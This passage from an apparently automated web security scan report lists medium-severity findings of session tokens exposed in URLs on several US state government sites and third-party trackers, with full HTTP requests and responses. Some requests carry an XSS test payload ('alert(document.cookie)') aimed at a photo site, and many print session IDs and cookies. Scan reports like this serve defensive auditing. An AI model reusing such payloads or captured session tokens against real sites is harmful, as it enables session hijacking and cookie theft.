...[SNIP]...
<head>
<link rel='stylesheet' type='text/css' href='/app/calendar/a4j_3_1_3.GAorg/richfaces/renderkit/html/css/calendar.xcss/DATB/eAELvfwiAQAGAQJx;jsessionid=D59995EC79DD38BD722B830119C04CCB' /><script type='text/javascript' src='/app/calendar/a4j_3_1_3.GAorg.ajax4jsf.javascript.AjaxScript'>
...[SNIP]...

8.7. http://az.gov/app/calendar/a4j_3_1_3.GAorg/richfaces/renderkit/html/css/calendar.xcss/DATB/eAELvfwiAQAGAQJx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://az.gov
Path:   /app/calendar/a4j_3_1_3.GAorg/richfaces/renderkit/html/css/calendar.xcss/DATB/eAELvfwiAQAGAQJx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /app/calendar/a4j_3_1_3.GAorg/richfaces/renderkit/html/css/calendar.xcss/DATB/eAELvfwiAQAGAQJx;jsessionid=964884B254954F11A8A397B20587D9B1 HTTP/1.1
Host: az.gov
Proxy-Connection: keep-alive
Referer: http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=70586944.1304162091.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=70586944.792197131.1304162091.1304162091.1304162091.1; __utmc=70586944; __utmb=70586944.1.10.1304162091; JSESSIONID=964884B254954F11A8A397B20587D9B1

Response

HTTP/1.1 200 OK
Age: 47
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 6118
Content-Type: text/css;charset=ISO-8859-1
Expires: Sun, 01 May 2011 11:14:28 GMT
Last-Modified: Thu, 09 Dec 2010 22:11:40 GMT
X-Powered-By: JSF/1.2
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Server: Apache-Coyote/1.1
Date: Sat, 30 Apr 2011 11:14:28 GMT
Cache-control: max-age=86400
Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE)

.rich-calendar-exterior{border:1px solid;}.rich-calendar-btn{cursor:pointer;}.rich-calendar-header-optional{border-bottom:1px solid;padding:7px;height:22px;}.rich-calendar-header{border-right:0 solid;
...[SNIP]...

8.8. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=1443&token=NETM7 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Tue, 24-Apr-2012 15:08:25 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7; Domain=.contextweb.com; Expires=Sun, 03-Apr-2016 15:08:25 GMT; Path=/
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.9. http://de.gov/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://de.gov
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: de.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 148548

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<meta name="verify-v1" content="thP3VfXQ653dVrb9ExI9XqvyNnfVO9/R4
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Corporations</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Revenue</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">General Questions &amp; Help</a></strong> - M-F: 8:30 to 4:30 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...

8.10. http://de.gov/profile.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://de.gov
Path:   /profile.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /profile.php HTTP/1.1
Host: de.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fcspersistslider1=3;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:19:26 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25272

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<!-- Global meta tags, external stylesheets and scripts -->
<meta
...[SNIP]...
<!-- BEGIN LivePerson Link Code -->&#45;<a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=portal_help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/" target='chat33511087' onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=portal_help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); window.open(lpButtonCTTUrl,'chat33511087','width=475,height=400,resizable=yes');return false;">
Live Chat</a>
...[SNIP]...

8.11. http://ga.gov/00/home/0,2061,4802,00.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ga.gov
Path:   /00/home/0,2061,4802,00.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87 HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:16 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 27652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang=
...[SNIP]...
<li><a href="https://services.georgia.gov/dhr/cspp/do/public/Welcome;jsessionid=cf0d1e9e75a08ffffffffc5d3c9e28e6400d:ymHt" target="_blank">Child Support Services</a>
...[SNIP]...

8.12. http://ga.gov/00/home/0,2061,4802,00.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ga.gov
Path:   /00/home/0,2061,4802,00.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87 HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:16 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 27652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang=
...[SNIP]...

8.13. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://kodakimagingnetworki.tt.omtrdc.net
Path:   /m2/kodakimagingnetworki/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/kodakimagingnetworki/mbox/standard?mboxHost=www.kodakgallery.com&mboxSession=1304176122561-938029&mboxPage=1304176122561-938029&screenHeight=1200&screenWidth=1920&browserWidth=998&browserHeight=935&browserTimeOffset=-300&colorDepth=16&mboxCount=1&sourceId=700019816903&user.categoryId=&prodId=&clickedOn=&profileType=anon&featureTestName=noFeatureTest&mbox=kgMetrics&mboxId=0&mboxTime=1304158122566&mboxURL=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F43&mboxVersion=40 HTTP/1.1
Host: kodakimagingnetworki.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1499
Date: Sat, 30 Apr 2011 15:08:20 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('kgMetrics',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-kgMetr
...[SNIP]...

8.14. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=53c584b0-e5ea-446d-83bc-544476c174c5&hostname=tn.gov&location=%2F&url=http%3A%2F%2Ftn.gov%2F&sessionID=1304123848236.87792&fpc=false&ts1304123873055.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 00:37:30 GMT
Connection: keep-alive


8.15. https://louisianadcpretire.gwrs.com/login.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://louisianadcpretire.gwrs.com
Path:   /login.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /login.do HTTP/1.1
Host: louisianadcpretire.gwrs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:11 GMT
Server: FASCore
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 10709
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=khX0N72Svxws3br!-1692232030!-1164814424; path=/
Content-Language: en-US
P3P: CP="ALL DSP COR CUR ADM DEV TAI HIS OUR OTRi BUS PHY ONL UNI FIN COM NAV INT DEM GOV"
Connection: close
Content-Type: text/html;charset=UTF-8

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"><head><script language="JavaScript" type="text/JavaScript">
<!--
function setFocus() {
document.getElementById("SSN").focus()
...[SNIP]...
<span class="systemMenuBottomNode"><a href="/link.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=599&accu=Louisiana&contentUrl=systemMenu.contactUs">Contact Us<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a href="/link.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=996&accu=Louisiana&contentUrl=systemMenu.laLinks">LA Links<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a href="/link.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=601&accu=Louisiana&contentUrl=systemMenu.privacy">Privacy<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a target="_blank" href="/Redirect.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=997&accu=Louisiana&property=systemMenu.psc">PSC<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a href="/link.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=602&accu=Louisiana&contentUrl=systemMenu.systemRequirements">System<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a href="/link.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=603&accu=Louisiana&contentUrl=systemMenu.security">Security<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a target="_blank" href="/Redirect.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=825&accu=Louisiana&property=systemMenu.bcp">Business Continuity<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...
<span class="systemMenuBottomNode"><a target="_blank" href="/Redirect.do;jsessionid=khX0N72Svxws3br!-1692232030!-1164814424?nodeId=2315&accu=Louisiana&property=systemMenu.brokerCheckNotify">Broker Check Notification<span style="height: 0px; width: 0px; position: absolute; overflow: hidden; top: -10px ">
...[SNIP]...

8.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fkentucky.gov%2FPages%2Fhome.aspx&callback=_xdc_._tgkwur&token=3823 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 00:37:18 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._tgkwur && _xdc_._tgkwur( [1] )

8.17. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d-90&2d-3.14453125&2m2&1d90&2d163.14453125&2u3&4sen-US&5e0&callback=_xdc_._73y626&token=15751 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 11:23:05 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4488

_xdc_._73y626 && _xdc_._73y626( ["Map data ..2011 Europa Technologies, Geocentre Consulting, Tele Atlas, Whereis(R), Sensis Pty Ltd",[["obliques",[[40.97989806962013,0],[55.77657301866769,22.5]]],["ob
...[SNIP]...

8.18. http://mt0.googleapis.com/mapslt/ft  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mt0.googleapis.com
Path:   /mapslt/ft

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mapslt/ft?hl=en-US&lyrs=m%7Cundefined%7Cos%3A1108961508&las=tuvwuu,tuvwuw,tuvwwu,tuvwww,tuwvtt,tuwvtu,tuwvtv,tuwvtw,tuwvut,tuwvuv,tuwvvt,tuwvvu,tuwvvv,tuwvvw,tuwvwt,tuwvwv,twtuuu,twuttt,twuttu,twutut&z=6&src=apiv3&xc=1&callback=_xdc_._coix7n&token=46082 HTTP/1.1
Host: mt0.googleapis.com
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:05 GMT
Expires: Sat, 30 Apr 2011 11:23:05 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maptiles-versatile
X-XSS-Protection: 1; mode=block
Content-Length: 773

_xdc_._coix7n && _xdc_._coix7n([{id:"tuvwuu",zrange:[6,6],layer:"m"},{id:"tuvwuw",zrange:[6,6],layer:"m"},{id:"tuvwwu",zrange:[6,6],layer:"m"},{id:"tuvwww",zrange:[6,6],layer:"m"},{id:"tuwvtt",zrange:
...[SNIP]...

8.19. https://myalaska.state.ak.us/home/app  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myalaska.state.ak.us
Path:   /home/app

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /home/app?service=external/launch&pubid=opc HTTP/1.1
Host: myalaska.state.ak.us
Connection: keep-alive
Referer: https://myalaska.state.ak.us/home/app
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:10:40 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 14:00:00 AKST
Set-Cookie: JSESSIONID=504573A026BB83CC1E30CCDAE8301E13; Path=/home; Secure
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 19943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- Application: myalaskabarebones -->
<!-- Page: launch -->
<!-- Generated: Sat Apr 30 14:10:40
...[SNIP]...
<div style="margin-left:4px">

<a href="/home/app;jsessionid=504573A026BB83CC1E30CCDAE8301E13?service=page/Home"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
...[SNIP]...
<br />
<a href="/home/app;jsessionid=504573A026BB83CC1E30CCDAE8301E13?service=page/forgotusername"><FONT size="2" face="Verdana, Arial, Helvetica, sans-serif">
...[SNIP]...
<br />
<a href="/home/app;jsessionid=504573A026BB83CC1E30CCDAE8301E13?service=page/forgotpassword"><FONT size="2" face="Verdana, Arial, Helvetica, sans-serif">
...[SNIP]...

8.20. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//de.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5637922666&scriptVersion=1.1&d=1304123925477&&amp;SESSIONVAR!skill=Portal_Topics&amp;PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
